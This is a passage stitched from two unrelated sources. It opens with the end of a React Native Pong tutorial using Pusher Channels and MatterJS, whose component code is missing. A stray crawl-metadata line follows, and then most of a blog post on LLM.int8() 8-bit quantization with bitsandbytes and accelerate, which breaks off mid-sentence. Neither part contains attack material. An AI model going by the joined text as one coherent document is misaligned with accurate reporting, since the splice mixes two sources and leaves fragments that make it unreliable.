Now, use the generated private key to create your Hyper Protect Virtual Server here. Try to log in to your server via the terminal to make sure everything is working properly. You can find this process explained in more detail in the Hyper Protect Virtual Server overview as well as in the SSH documentation.
Step 2: Enable an SSH key login for your IBM Delivery Pipeline
To enable the toolchain to deploy on custom servers, you use a custom docker image running Linux, which stores the SSH keys. This will be used to send commands on to your server. I’ll discuss more on this later.
To generate the docker image, download the sshimage folder from this git repository to your desktop.

Next, open your SSH key folder: if you're using a Mac, use Shift+Command+G in Finder to open the Go to Folder search mask; if you're on a Windows device, use Windows+R. Enter
~/.ssh/ (or the path shown in your terminal when you generated your SSH keys). A folder should open with three text files inside named id_rsa, id_rsa.pub, and known_hosts. Copy all three files into the sshimage folder.
Now, open the CLI and navigate to the
sshimage folder. Run the command
docker build. Docker creates an image with a small Linux version and your keys in place. With the command docker
image ls you should be able to see your newly created image.
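For illustration only — the actual Dockerfile shipped in the linked repository is authoritative and may differ — an image like sshimage can be sketched along these lines, baking the three copied key files into /root/.ssh so the pipeline containers can open SSH sessions:

```dockerfile
# Hypothetical sketch of an SSH-enabled pipeline image (the base image
# and package names are assumptions, not taken from the repository).
FROM alpine:3.10
RUN apk add --no-cache openssh-client
COPY id_rsa id_rsa.pub known_hosts /root/.ssh/
RUN chmod 700 /root/.ssh && chmod 600 /root/.ssh/id_rsa
```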
Next, tag your image with docker tag <local_image> us.icr.io/<my_namespace>/<my_repo>:<my_tag> and upload it with docker push us.icr.io/<my_namespace>/<my_repo>:<my_tag> to the IBM Container Registry. Check out the Kubernetes Registry Quick Start guide for more details.
Step 3: Create the pipeline
Head over to the DevOps toolchains page and create a Cloud Foundry toolchain. Link the git repository with the code you want to use and enter an API-Key (if you don’t have one you can generate one).
After creating your toolchain, you should see a dashboard where you can configure multiple elements. Click the field with the label Delivery Pipeline. The two stages of your pipeline should now be visible.
Click on the gear in the upper right corner of the Build Stage and then click the Configure Stage option. Choose the custom Docker image as your builder type and enter the name of your sshimage from your IBM Cloud Container Registry.
Next, click on Add Job and select Deploy. Choose the custom Docker image as your builder type. Enter the name of your sshimage from your Cloud Container Registry.
Now open the Environment properties tab. Add a secure property with the name DOCKER_USERNAME and the value iamapikey. Add a second secure property with the name DOCKER_PASSWORD and an API key as your value. You can generate an API key here. Finally, add a text property with the name SERVER1 and the IP address of your Hyper Protect Server as its value.
Step 4: Configure the pipeline
Please note that the following steps are specific to the Node.js version of AcmeAir but altering these steps for different programs can be done.
Go back to the Jobs tab, open your Build Stage, and add this to the Build Script window:
ssh -t -t $SERVER_1 'rm -r acmeair-nodejs'
ssh -t -t $SERVER_1 'git clone'
ssh -t -t $SERVER_1 'cd acmeair-nodejs && docker build -t acmeair/web .'
Find the Jobs tab once more and open your Deploy Stage. Now enter the following in the Build Script window:
ssh -t -t $SERVER_1 'docker login -u iamapikey -p $DOCKER_PASSWORD uk.icr.io'
ssh -t -t $SERVER_1 'docker tag acmeair/web uk.icr.io/hansdocker/acmeair'
ssh -t -t $SERVER_1 'docker push uk.icr.io/hansdocker/acmeair'
Return to your toolchain overview and press the play button on your Build Stage to see if your toolchain is working. After it’s finished, you should see the
sshimage in the form of a docker image in your IBM Container Registry.
Navigate back to the overview of your pipeline and click on the gear in the upper right corner of the Deploy Stage. Then, click on Configure Stage.
Open the Environment properties tab and add a secure property with the name DOCKER_USERNAME and the value iamapikey.
Add a secure property with the name DOCKER_PASSWORD and an API key as your value. Then add a text property with the name SERVER1 and the IP address of your Hyper Protect Server as its value.
Return to the Jobs tab and remove the Rolling Deploy stage. You now need to create four new Deploy Stages and name them Prepare, Deploy, Availability Test, and Info. Set all four stages to use the custom Docker image sshimage, just like you did in the previous step. Now you're ready to set the code for these four stages.
For the Prepare stage enter:
ssh -t -t root@$SERVER 'docker stop acmeair_web_001'
ssh -t -t root@$SERVER 'docker rm acmeair_web_001'
ssh -t -t root@$SERVER 'docker ps'
For the Deploy stage enter:
ssh -t -t root@$SERVER 'docker login -u iamapikey -p $DOCKER_PASSWORD uk.icr.io'
ssh -t -t root@$SERVER 'docker pull uk.icr.io/hansdocker/acmeair'
ssh -t -t root@$SERVER 'docker run -d -P -p 9080:9080 --name acmeair_web_001 --link mongo_001:mongo uk.icr.io/hansdocker/acmeair'
For the Availability Test stage enter:
#!/bin/bash
if curl -ivs
then
    echo "Server is UP"
else
    echo "Server is down" 1>&2
fi
For the Info stage enter:
ssh -t -t root@$SERVER 'docker ps'
echo
Now return to your toolchain overview and click play on your Deploy Stage to see if your toolchain works.
After you're finished, you should be able to click on Info in the list of your stages to view your logs. There will be a link to the AcmeAir website running on your Hyper Protect Virtual Server. You can easily add more servers by simply duplicating the Deploy Stage and changing the IP address in the environment properties to point at your new server.
Summary
Congratulations! By following this tutorial, you can now use IBM toolchain to connect to various servers by using the SSH connection standard. If you’d like, check out the IBM Toolchain deploys to Hyper Protect Virtual Servers video that demonstrates the toolchain running and explains the function of the code in more detail.
You can also learn more about the IBM Delivery Pipeline and toolchain by visiting the IBM Cloud documentation. | https://developer.ibm.com/tutorials/deploy-software-to-private-hyper-protect-virtual-servers-using-ibm-toolchain/ | CC-MAIN-2020-34 | refinedweb | 1,360 | 63.09 |
Convert QVariantList to QList<Type> list
Hi All
I have a QVariantList which is passed as a parameter to my function.
void myfunc(const QVariantList &list)
{
    // I want to convert this to QList<Type> newList
    // where Type is the type() of list.at(0)
    // the variant list consists of variants all of the same type
}
What I want to do is
QList<Type> newList; // how do I declare this if I don't know the Type
foreach(QVariant v, list)
    newList << v.value();
Then create a QSet from the newList
Is there a way of easily achieving this
Regards
Ikim
Hi and welcome to devnet,
Do you mean
QSet<Type> newSet = newList.toSet();
?
If so, why not:
QSet<Type> newSet;
foreach(QVariant v, list) {
    newSet << v.value<Type>();
}
?
Hi and thanks
How do I declare QSet<Type> at compile time when I dont know Type
Thanks
What is your use case ?
How do I declare QSet<Type> at compile time when I dont know Type
You can't! In C++ you must define the type of templates.
Question: Why cannot you use
QSet<QVariant>??
Hi
I need to compare two variant lists, both containing variants of the same type, and determine the variants that are common to both lists.
Thanks
You can use QVariant directly without conversion because QVariant supports operator==().
QVariant has the == operator
@SGaist yes I could compare each QVariant in the list but that would mean iterating over the entire list to determine if the item exists in the second list. Is that my only option ?
Thanks
No, use the QSet features e.g.
QSet<QVariant> commonSet = mySet1 & mySet2;
@SGaist Thanks, so I can use a QSet<QVariant> out of the box ?
other forums are suggesting that I need to define a qhash() function for the QVariant.
QSet is based on a hash table; this means that internally it uses qHash().
@ikim why not use the QVariant::Type method? You can even use it with a C++ template.
@mcosta Thanks but this gives a compile error
QSet<QVariant> existingValues;
existingValues.insert(1);
Which kind of error?
@mcosta /usr/include/QtCore/qhash.h:882:24: error: no matching function for call to 'qHash(const QVariant&)'
mmmm, You're right.
So I suggest creating a template method.
This code works for me
template <typename T>
QSet<T> mergeList(const QVariantList& l1, const QVariantList& l2)
{
    QSet<T> s1, s2;

    for (const QVariant& v: l1) {
        s1.insert(v.value<T>());
    }
    for (const QVariant& v: l2) {
        s2.insert(v.value<T>());
    }

    return s1 & s2;
}
Used as
QVariantList l1, l2;

l1 << 1 << 2 << 3;
l2 << 1 << 3 << 5;

QSet<int> s1 = mergeList<int> (l1, l2);
qDebug() << s1;

l1.clear();
l2.clear();

l1 << "Foo" << "Bar";
l2 << "Bar" << "Fred";

QSet<QString> s2 = mergeList<QString> (l1, l2);
qDebug() << s2;
@mcosta Thanks for your effort, but this still doesn't solve the problem, as I don't know the Type at compile time.
Hi,
I'm not a C++ super-guru but I don't think you can do it because the compiler must know the type of each variable at compile time.
A solution could be implement
qHash(const QVariant &v)and use
QSet<QVariant>
@SGaist yes I could compare each QVariant in the list but that would mean iterating over the entire list to determine if the item exists in the second list. Is that my only option ?
Thanks
I think @mclark 's answer is the better one.
You can also implement qHash for the type you need to support and thus it will be used automatically in all your software.
#include <QtDebug>
#include <QApplication>

inline uint qHash(const QVariant &key, uint seed = 0)
{
    switch (key.userType()) {
    case QVariant::Int:
        return qHash(key.toInt(), seed);
    case QVariant::UInt:
        return qHash(key.toUInt(), seed);
    // add all cases you want to support
    }
    return 0;
}

int main( int argc, char * argv[] )
{
    QApplication app( argc, argv );

    QVariantList vl1;
    QVariantList vl2;

    for (int i = 0 ; i < 5 ; ++i) {
        vl1 << i;
    }
    for (int i = 0 ; i < 3 ; ++i) {
        vl2 << i;
    }

    qDebug() << (vl1.toSet() & vl2.toSet());

    return 0;
}
public class HelloWorld{

    public static void main(String []args)throws IOException {
        try {
            for(int i=0;i<24;i++) {
                for(int j=0;j<60;j++) {
                    for(int k=0;k<60;k++) {
                        clrscr();
                        System.out.print(i+":"+j+":"+k);
                        Thread.currentThread().sleep(1000);
                        /* if(kbhit()) exit(0);*/
                    }
                }
            }
        }
hi friend,
you have missed the catch/finally block. A try block must be followed by a catch or finally block.
PKS namespacecsam2020 May 8, 2019 11:40 PM
Hi,
We are in the process of implementing the PKS infrastructure. Since we are quite new to this topic, would like to get some guidelines/best practices on the below point.
Since we are going to use the same setup for the Development, QA & Production , what is the best practices to segregate these environments.
Is it have separate clusters for each environment [DEV/QA &POD]?, and create namespaces within to segregate different projects?
Or
Have one or two clusters [one for DEV & QA and one for PRD] and segregate each project with respect to the namespaces?
or
Any other recommendations?
Kindly advice.
Regards,
Sam
1. Re: PKS namespacenathanreid May 29, 2019 8:23 AM (in response to csam2020)
Hi Sam,
There are pros and cons to either approach, so not one correct answer to your question. Multiple clusters per environment will enable you to test different cluster config changes, provide a greater degree of segregation between workloads, and allow you to dedicate resources with less configuration in k8s. Namespace isolation reduces the number of cluster configs you need to manage (e.g. k8s cluster secrets, etc.) but won't enable you to test things like changed in k8s cluster security without affecting both dev and prod.
With a good CI pipeline/GitOps approach, you will reduce the amount of effort and the potential for error in maintaining config parity across clusters. PKS-provisioned k8s clusters with NSX CNP and namespace firewalling enable considerable isolation between workloads, but that will not address the topics I've listed above. If your goal is to have the most flexibility and resilience in testing, my opinion is that multiple clusters is the better option. With PKS, you could even create a dev and test cluster as part of your CI pipeline, and then tear them down after promotion to prod.
2. Re: PKS namespacedrfooser Jun 12, 2019 1:08 PM (in response to csam2020)
We have Pivotal Container Services and BOSH running on our VMWare vSAN. We chose to deploy multiple K8S clusters - Development, QA, Application Engineering & Infrastructure. This is working well for us so far. It still allows individual members of each team to have their own namespace within their teams cluster. | https://communities.vmware.com/message/2858050 | CC-MAIN-2019-35 | refinedweb | 375 | 62.27 |
Save this as helloworld.py anywhere in your Python path:
import irc

dependencies=[]
IRC_Object=None

def send_hi(self, channel):
    self.send_string("PRIVMSG %s :Hello World!" % channel)

def handle_parsed(prefix, command, params):
    if command=="PRIVMSG":
        if params[1]=='hi':
            IRC_Instance.active.events['hi'].call_listeners(params[0])

def initialize( ):
    irc.IRC_Connection.send_hi=send_hi

def initialize_connection(connection):
    connection.add_event("hi")
    connection.events['parsed'].add_listener(handle_parsed)
The first line is the import irc needed to get
access to the IRCLib classes.
The first variable
defined in this extension script is dependencies.
If your extension depends on other extensions to work, you can put
the names of the extensions in this list. IRCLib will then load these
extensions first before loading yours.
IRC_Instance is a reference to the
IRC_Object instance in the program that is loading
your extension.
The script then continues to define four
functions:
This function will get added to the IRC_Connection
class. It sends the string "Hello
World!" to the channel specified by
channel.
This is an event handler for the 'parsed' event.
It's used to get the parsed lines from IRCLib. If
the line matches with "hi," all
listeners for the 'hi' event are called. The
destination of the message (was it said in a channel or private
message?) is given to the event handlers as the first argument. Note
that it's using
IRC_Instance.active to get the connection that
triggered the event. This variable exists so you
don't have to pass IRC_Connection
references to each event handler.
This function is called immediately after the script is loaded. This
sets the send_hi function as a method for the
class IRC_Connection.
This function is called each time a new connection is created, with
the IRC_Connection instance as its only argument.
The first line of the function adds a 'hi' event
to each connection. The second line connects
'handle_parsed' to the 'parsed'
event for each connection.
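The add_event/add_listener/call_listeners mechanism the extension relies on can be sketched in plain Python (this is an illustration of the pattern, not IRCLib's actual implementation):

```python
class Event:
    """A named event that fans arguments out to registered callables."""

    def __init__(self, name):
        self.name = name
        self.listeners = []

    def add_listener(self, func):
        self.listeners.append(func)

    def call_listeners(self, *args):
        for func in self.listeners:
            func(*args)

# Register a listener for a 'hi' event and fire it with a channel name,
# mirroring how handle_parsed() triggers the listeners above.
greetings = []
hi_event = Event('hi')
hi_event.add_listener(greetings.append)
hi_event.call_listeners('#test')
print(greetings)  # ['#test']
```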
© 2007 O'Reilly Media, Inc.
Topic Last Modified: 2007-11-09
You can use Microsoft Visual Studio 2005, but in many ways it is better to use wsdl.exe to generate proxies than to use the Add Web Reference wizard in Visual Studio 2005. To begin, open a Command Prompt window.
Run wsdl.exe with the following suggested arguments:
The following is an example of the full command:
wsdl.exe /namespace:ExchangeWebServices /out:EWS.cs

Next, compile the generated proxy class with csc.exe, using the following suggested arguments:

csc /out:EWS_E2K7_release.dll /target:library EWS.cs
Add a reference to the library that you created in step 3. You can now view IntelliSense information in the Object Browser or the text editor while you are instantiating a new class. | http://msdn.microsoft.com/en-us/library/bb629923.aspx | crawl-002 | refinedweb | 113 | 52.76 |
The reverse lines-per-second test seems to be working at the same rate on the PC side: the PC sends ~19K strings per second to the T4 sketch, which counts '\n' characters and sends the count string to Serial2 once per second:
Code:
count= 10976993, lines per second=18893.
count= 10996057, lines per second=19064.  // PC SENDS THIS
count= 11014347, lines per second=18290.
count= 11032841, lines per second=18494.
count= 11051516, lines per second=18675.  // T4 calculates and appends this with print
count= 11070233, lines per second=18717.

PC code uses same lps_test code with 'S' for send as param 2 - will post later.
The output above with println('.') is generally correct, but there is some ECHO anomaly: with the code as follows { #if 1 versus #if 0 } I get a lot of this:
Output above using TyCommander - similar from using IDE SerMon - so seems to be a bug somewhere as T_3.5 gets it Serial2 then it sends out USB … will send text OUT Serial to PC and have it print instead:

Code:
count= 10969835, lines per second=18854
count= 10988580, lines per second=18745
45
count= 11007214, lines per second=18634
34
count= 11026041, lines per second=18827

Code:
count= 10465392, lines per second=19022
22
count= 10484416, lines per second=19024
count= 10503446, lines per second=19030
30
count= 10522287, lines per second=18841
count= 10540880, lines per second=18593
93
count= 10559403, lines per second=18523
23
count= 10578191, lines per second=18788
count= 10596470, lines per second=18279
79
count= 10615171, lines per second=18701
01
count= 10634039, lines per second=18868
count= 10652267, lines per second=18228

Code:
uint32_t count, prior_count;
uint32_t prior_msec;
uint32_t count_per_second;

void setup() {
  Serial.begin(1000000);
  Serial2.begin(2000000);
  // while (!Serial) ;
  count = 10000000;
  prior_count = count;
  count_per_second = 0;
  prior_msec = millis();
}

void yield() {}

void loop() {
  char c;
  int ii = 0;
  char buf[100];
  while (Serial.available()) {
    c = Serial.read();
    if (c == '\n') {
      count = count + 1;
      uint32_t msec = millis();
      if (msec - prior_msec > 1000) {
        prior_msec = prior_msec + 1000;
        count_per_second = count - prior_count;
        prior_count = count;
        buf[ii] = 0;
        Serial2.print(buf);
#if 1 // this is showing echo on print of last digits of count_per_second and newlines
        Serial2.println(count_per_second);
#else
        Serial2.print(count_per_second);
        Serial2.println('.');
#endif
        ii = 0;
      }
    } else {
      buf[ii++] = c;
    }
  }
}
The command sets a scale and offset for all attachments made to a specified device axis. Any attachment made to a mapped device axis will have the scale and offset applied to its values: the value from the device is multiplied by the scale and the offset is added to this product. With an absolute mapping, the attached attribute gets the resulting value. If the mapping is relative, the final value is the offset added to the scaled difference between the current device value and the previous device value. This mapping will be applied to the device data before any mappings defined by the setAttrMapping command.

A typical use would be to scale a device's input so that it is within a usable range. For example, the device mapping can be used to calibrate a spaceball to work in a specific section of a scene. If the spaceball is set up with absolute device mappings, constantly pressing in one direction will cause the attached attribute to get a constant value. If a relative mapping is used and the spaceball is pressed in one direction, the attached attribute will change by a constantly increasing (or constantly decreasing) value and will find a rest value equal to the offset.

There are important differences between how the relative flag is handled by this command and by the setAttrMapping command. (See the setAttrMapping documentation for specifics on how it calculates relative values.) In general, a relative device mapping (this command) and a relative attachment mapping (setAttrMapping) should not be used together on the same axis.
Derived from mel command maya.cmds.setInputDeviceMapping
Example:
import pymel.core as pm pm.assignInputDevice( '"move -r XAxis YAxis ZAxis"', d='spaceball' ) pm.setInputDeviceMapping( d='spaceball', ax=['XAxis', 'YAxis', 'ZAxis'], scale=0.01, r=True ) # The first command will assign the move command to the spaceball. # The second command will scale the three named axes by 0.01 and # only return the changes in device position. | http://www.luma-pictures.com/tools/pymel/docs/1.0/generated/functions/pymel.core.system/pymel.core.system.setInputDeviceMapping.html#pymel.core.system.setInputDeviceMapping | crawl-003 | refinedweb | 330 | 56.15 |
Re: Operator overloading [was Re: 7.0 wishlist?]
- From: Jerry Gerrone <scuzwalla@xxxxxxxxx>
- Date: Mon, 17 Nov 2008 04:32:07 -0800 (PST)
On Nov 16, 11:27 pm, Joshua Cranmer <Pidgeo...@xxxxxxxxxxxxxxx> wrote:
A reason why immutability is a good thing. In any case, the intent I
attempted to convey was the fallacy of naïve translation of mathematical
concepts to programming.
Somehow, I doubt Harry was proposing that the translation be naïve. :)
A side effect is a side effect. True, some may be only visible to the
internal code in the API, but, as far as the JLS is concerned, it's a
side effect if some Java code could detect the difference.
As I understood the proposal, it would have to break encapsulation to
do so, and the semantics of well-behaved code wouldn't be dependent on
the exact order of evaluation, although the performance might be.
Poorly-behaved code would behave in a manner that would require
language-lawyering, just like it already does with multiple "i++" in
one line of code. An example I think Harry'd mentioned explicitly.
(The above assumes correct code).
While users ideally need only deal with correct code, the specification
must deal with any valid code.
I'm sure it would.
To paraphrase a CSS spec developer: "You
may not worry about what a web page looks like on a 3x3-pixel screen,
but a browser has to worry about that."
A browser might as well give up on that and assume some sort of
minimum that's a darn sight bigger than 3x3; no matter what it does,
the results will be unusable below some threshold resolution, so it
might as well be designed to give the best possible results above that
threshold regardless of the effects doing so has below that threshold.
Worrying about how the presentation might degrade at 3x3 is like
worrying about how you'll get to work the next day if your car goes
over that cliff at 40mph, when you happen to be in that car.
I doubt a change that would break either of these conditions would fly:
* User-overloaded operators would evaluate in the same order as the
operators they are based on, i.e. operands are evaluated as they appear
and associate as the operators (left-to-right except for the few
right-to-left ones).
* An expression involving user-overloaded operators can be rewritten as
an expression (not a series of statements) using the base methods.
I don't see why the second one is necessary. The first one is strongly
desirable, but for the case of OlderClass op NewerClass with
NewerClass defining op it will generally be necessary to give up the
second one to get the first.
2. The spirit of operator overloading should be agnostic to the name of
the operator being overloaded, modulo something like interface names or
the arity of the operator.
Why?
A proposal I saw on the possibility of "contracts" (or static
implementation of interfaces) gave me an idea to work around the
LHS-issue with a bit more workaround:
public interface Addable<Left, Right, Value> {
Value add(Left left, Right right);
}
public class Matrix<T extends ...> implements
static Addable<Matrix<T>, Matrix<T>, Matrix<T>>,
static Multipliable<T, Matrix<T>, Matrix<T>> {
static Matrix<T> multiply(T scalar, Matrix<T> matrix) {
Matrix<T> result = new Matrix<T>(matrix);
for (T[] row : result.rows) {
for (int i = 0; i < row.length; i++) {
row[i] = T * row[i];
}
}
}
}
with suitable `? super' and `? extends' thrown in the type definitions.
Writing generics libraries is still a pain, though.
Thus the compiler could then translate the expression |scalar * matrix|
to |multiply(scalar, matrix)|...
Seems pointless to introduce a whole new kind of "interface" for this
purpose. In that case, you might as well just allow static methods
Foo.operator+ (or whatever, I used the C++-like name) and operator
overloading enabled using import static.
Given such a fix, Addable and similar interfaces enable extending
java.util (or java.math?) with useful new things, for example an
accumulate method that can take a Collection<Addable<Foo>> and return
a Foo that is their sum, or an Accumulator<Foo> that can perform
accumulations.
Implementation via interfaces opens up wide possibilities that could not
be offered by other proposals for operator overloading. Indeed, it is
probably safe to say that these interfaces alone--along with
retrofitting the appropriate primitive wrappers, BigInteger, and
BigDecimal--would be powerful enough, even if operator overloading
didn't follow.
They would also make operator overloading that much "closer", in some
sense, such that it'd have a decent shot at getting in in the *next*
Java version after the one that added Harry's proposed interfaces.
One step at a time, I'd say. Pin down the implementation of regular
operator overloading before trying to extend it.
I thought this was now about implementing these interfaces and some
compiler tweaks, then adding operator overloading later as a layer on
top?
Harry?
Hmm...
public interface CumulativeAddable<Param, Return> extends
Addable<Param, Param, Return> {
public Return add(Param... params);
}
Erk. I think I prefer Accumulator.
fully generalize this -- left-summand type, right-summand type, and
result type; StringBuilder would implement
Accumulator<String,Object,String> since it can add any Object to a
String and return a String, for instance.
But it can also add any String to an Object and get a String. Unfortunately.
As I understood Harry's latest proposal, this would basically be
StringBuilder, not String.
Eh, then the third type parameter's not needed. Or the first isn't.
It'd just be Accumulator<Object,String>, left hand argument is what
you can add, right hand argument is the type of the running sum and of
the result. Addable<Object,String> on String, also, since it can be
added to any Object to get a String.
Eh. You also need a way to get the "zero" for the accumulation.
Addable needs a getIdentity() method, and ugly-enough this needs to be
non-static for an interface to specify it. For strings it would return
"", for numbers zero.
Then again, this could be generalized further. Accumulation of
products, with identity 1; of logical-ors, with identity false; of
logical-ands, with identity true; and so forth. Maybe some notion of
generalized commutative, associative operations? Mathematicians call
that an abelian group. We'd need something less exotic and easier to
type. And yes, we'd need to be able to implement the same interface
with multiple sets of generic parameters in a single class. That would
need reified generics, since otherwise method foo taking an
Addable<Foo,Bar> that's also an Addable<Baz,Quux> and doing its add
won't know whether to call Bar add(foo) or Quux add(bar) at runtime
due to erasure.
.
- Follow-Ups:
- Re: Operator overloading [was Re: 7.0 wishlist?]
- From: Harold Yarmouth
- References:
-: hzergel901
- Operator overloading [was Re: 7.0 wishlist?]
- From: Joshua Cranmer
- Prev by Date: Re: Possible bug in Calendar
- Next by Date: Re: Files not writing, closing files, finalize()
- Previous by thread: Operator overloading [was Re: 7.0 wishlist?]
- Next by thread: Re: Operator overloading [was Re: 7.0 wishlist?]
- Index(es): | http://coding.derkeiler.com/Archive/Java/comp.lang.java.programmer/2008-11/msg01579.html | crawl-002 | refinedweb | 1,208 | 53.81 |
Once your users are done tweaking the look and feel of a given interface, they can save the design as a template. The templates are stored in the Site Template Collection list, located at the root site of the current site collection. For example, if your site URL is and you save it as a template, the template will be located in the Site Template Collection.
These templates are available during a site's creation process, from any level within the site collection tree (the root site and all its sub-sites). Figure 1 shows the template's availability during the site creation wizard. Your users now have the ability to replicate their site many times over, all without needing any assistance from you.
However, because all their properties are set at design time, creating sites based on these saved site templates results in static content. This can become a problem in today's business environment, which demands dynamic site content.
Enter Reflection
.NET brought with it a set of tools neatly grouped into the System.Reflection namespace, which solves this problem. Reflection allows you to query information from any assemblyeven the same assemblydynamically. Information such as properties, fields, and methods, which were declared as public in the assembly, can be reflected. In addition, reflection allows you to retrieve the values of these properties and/or fields as well as set those values dynamically. Reflection also allows you to dynamically invoke methods of the assembly at run time and dynamically compile the code. With it, you can dynamically set a template's Web part properties, thus rendering a static site dynamic.
Please enable Javascript in your browser, before you post the comment! Now Javascript is disabled.
Your name/nickname
Your email
WebSite
Subject
(Maximum characters: 1200). You have 1200 characters left. | http://www.devx.com/dotnet/Article/28315 | CC-MAIN-2017-26 | refinedweb | 301 | 55.84 |
This is the mail archive of the cygwin@cygwin.com mailing list for the Cygwin project.
...says the function isn't there, but there it is. This is in config.log, is this 'normal' and/or a 'known problem'?
configure:15213: checking for strtol
configure:15250: g++ -o conftest.exe -g -O2 -L/usr/local/lib/ conftest.cc -lexp
at >&5
configure:15228: declaration of C function `char strtol()' conflicts with
/usr/include/stdlib.h:99: previous declaration `long int strtol(const char*,
char**, int)' here
configure:15253: $? = 1
configure: failed program was:
#line 15218 "configure"
#include "confdefs.h"
/* System header to define __stub macros and hopefully few prototypes,
which can conflict with char strtol (); below. */
#include <assert.h>
/* Override any gcc2 internal prototype to avoid an error. */
#ifdef __cplusplus
extern "C"
#endif
/* We use char because int might match the return type of a gcc2
builtin and then its argument prototype would still apply. */
char strtol ();
char (*f) ();
int
main ()
{
/* The GNU C library defines this for functions which it implements
to always fail with ENOSYS. Some functions are actually named
something starting with __ and the normal name is an alias. */
#if defined (__stub_strtol) || defined (__stub___strtol)
choke me
#else
f = strtol;
#endif
;
return 0;
}
configure:15269: result: no
-- Lapo 'Raist' Luchini lapo@lapo.it (PGP & X.509 keys available) (ICQ UIN: 529796) -- Unsubscribe info: Bug reporting: Documentation: FAQ: | https://sourceware.org/legacy-ml/cygwin/2002-12/msg00718.html | CC-MAIN-2021-39 | refinedweb | 230 | 59.9 |
Problem with Two DataModelKeuller Magalhães Aug 29, 2007 9:46 AM
Hi people,
I have a seriuos problem with @DataModel at same Managed Bean. I have using Seam 1.2.1 + Ajax4JSF + MyFaces + Tomahawk + Facelets on Tomcat 5.5.23.
Here is snippet code of my managed bean:
@Name("servicoBean") @Scope(ScopeType.EVENT) public class ServicoBean { @Logger private Log log; @DataModel("categorias") private List<Categoria> categorias; @DataModelSelection("categorias") private Categoria categoria; @DataModel("servicos") private List<Servico> servicos; ... }
And code of my XHTML page:
<h:form <t:dataTable <t:column> <t:commandLink </t:column> </t:dataTable> </h:form>
The most curious is the first @DataModel() "categorias" works fine, but the second one "servicos" does not work. Any error is displayed on page, but the data aren't displayed. Is there any patch to correct it or any workaround to solve that ?
Anyone can help me, please.
Regards.
This content has been marked as final. Show 3 replies
1. Re: Problem with Two DataModelMahesh Shinde Aug 29, 2007 10:09 AM (in response to Keuller Magalhães)
First thing don't use Datamodel name and List name same.
Second define DataModelSelection for Servico.
Basically DataMOdelSelection used for Clickable Datatable.LIke if you have EDIT/DEL functionality on h:datatable.
2. Re: Problem with Two DataModelLucas de Oliveira Aug 29, 2007 10:15 AM (in response to Keuller Magalhães)
Hi!
I'm using Jboss Seam, so I'm not sure if it will be as helpfull as u like but I would cut off these Datamodel names. So in resume, try the code below:
; ... }
I've done that with JSF+Seam and it works like a charm.
cheers!
ps.: If that doesn't help it would be good to post the stack trace so we can take a look at it and see if it's something else.
3. Re: Problem with Two DataModelKeuller Magalhães Aug 29, 2007 10:32 AM (in response to Keuller Magalhães)
Thanks for all tips, but anyone works.
Below is my modified code:
; @DataModelSelection("servicos") private Servico servico; ... }
I dont change anyXHTML code of "servicos.xhtml" page. The first @DataModel "categoria" works fine and display all data, but second "servicos" does not works again. I use two XHTML pages, the first page called "servicos.xhtml" shows result of "categorias" DataModel object and second page "listServices.xhtml" shows the result of "servicos" DataModel object, but any data is displayed on "listServices.xhtml".
The action code fired by <t:commandLink /> inside <t:dataTable />:
.. public String selecionaCategoria(Categoria categ) { log.info("Selecionando a categoria..." + categ.getId()); this.categoria = categ; findServicos(); return "success"; } ...
I'm using JBoss EL to call this action method. Here is code of "listServices.xhtml" page:
... <h:form <t:dataList <h:outputText </t:dataList> </h:form> ...
This <t:dataTable /> is empty but there is data in DataModel collection. I have two @Factory objects for each @DataModel object.
Any suggestion ?
Regards. | https://developer.jboss.org/thread/138266 | CC-MAIN-2018-39 | refinedweb | 481 | 50.94 |
Views contain all the HTML that you’re application will use to render to the user. Unlike Django, views in Masonite are your HTML templates. All views are located inside the
resources/templates directory.
All views are rendered with Jinja2 so we can use all the Jinja2 code you are used to. An example view looks like:
resources/templates/helloworld.html<html><body><h1> Hello {{ 'world' }}</h1></body></html>
Since all views are located in
resources/templates, we can use simply create all of our views manually here or use our
craft command tool. To make a view just run:
terminal$ craft view hello
This will create a template under
resources/templates/hello.html.
The
View class is loaded into the container so we can retrieve it in our controller methods like so:
app/http/controllers/YourController.pyfrom masonite.view import Viewdef show(self, view: View):return view.render('dashboard')
This is exactly the same as using the helper function above. So if you choose to code more explicitly, the option is there for you.
If this looks weird to you or you are not sure how the container integrates with Masonite, make sure you read the Service Container documentation
Some views may not reside in the
resources/templates directory and may even reside in third party packages such as a dashboard package. We can locate these views by passing a
/ in front of our view.
For example as a use case we might pip install a package:
terminal$ pip install package-dashboard
and then be directed or required to return one of their views:
app/http/controllers/YourController.pydef show(self, view: View):return view.render('/package/views/dashboard')
This will look inside the
dashboard.views package for a
dashboard.html file and return that. You can obviously pass in data as usual.
Caveats
It's important to note that if you are building a third party package that integrates with Masonite that you place any
.html files inside a Python package instead of directly inside a module. For example, you should place .html files inside a file structure that looks like:
package/views/__init__.pyindex.htmldashboard.htmlsetup.pyMANIFEST.in...
ensuring there is a
__init__.py file. This is a Jinja2 limitation that says that all templates should be located in packages.
Accessing a global view such as:
app/http/controllers/YourController.pydef show(self, view: View):return view.render('/package/dashboard')
will perform an absolute import for your Masonite project. For example it will locate:
app/config/databases/...package/dashboard.html
Or find the package in a completely separate third part module. So if you are making a package for Masonite then keep this in mind of where you should put your templates.
Most of the time we’ll need to pass in data to our views. This data is passed in with a dictionary that contains a key which is the variable with the corresponding value. We can pass data to the function like so:
app/http/controllers/YourController.pydef show(self, view: View, request: Request):return view.render('dashboard', {'id': request.param('id')})
Remember that by passing in parameters like
Request to the controller method, we can retrieve objects from the IOC container. Read more about the IOC container in the Service Container documentation.
This will send a variable named
id to the view which can then be rendered like:
resources/templates/dashboard.html<html><body><h1> {{ id }} </h1></body></html>
Views use Jinja2 for it's template rendering. You can read about Jinja2 at the official documentation here.
Masonite also enables Jinja2 Line Statements by default which allows you to write syntax the normal way:
{% extends 'nav/base.html' %}{% block content %}{% for element in variables %}{{ element }}{% endfor %}{% if some_variable %}{{ some_variable }}{% endif %}{% endblock %}
Or using line statements with the
@ character:
@extends 'nav/base.html'@block content@for element in variables{{ element }}@endfor@if some_variable{{ some_variable }}@endif@endblock
The choice is yours on what you would like to use but keep in mind that line statements need to use only that line. Nothing can be after after or before the line.
This section requires knowledge of Service Providers and how the Service Container works. Be sure to read those documentation articles.
You can also add Jinja2 environments to the container which will be available for use in your views. This is typically done for third party packages such as Masonite Dashboard. You can extend views in a Service Provider in the boot method. Make sure the Service Provider has the
wsgi attribute set to
False. This way the specific Service Provider will not keep adding the environment on every request.
from masonite.view import Viewwsgi = False...def boot(self, view: View):view.add_environment('dashboard/templates')
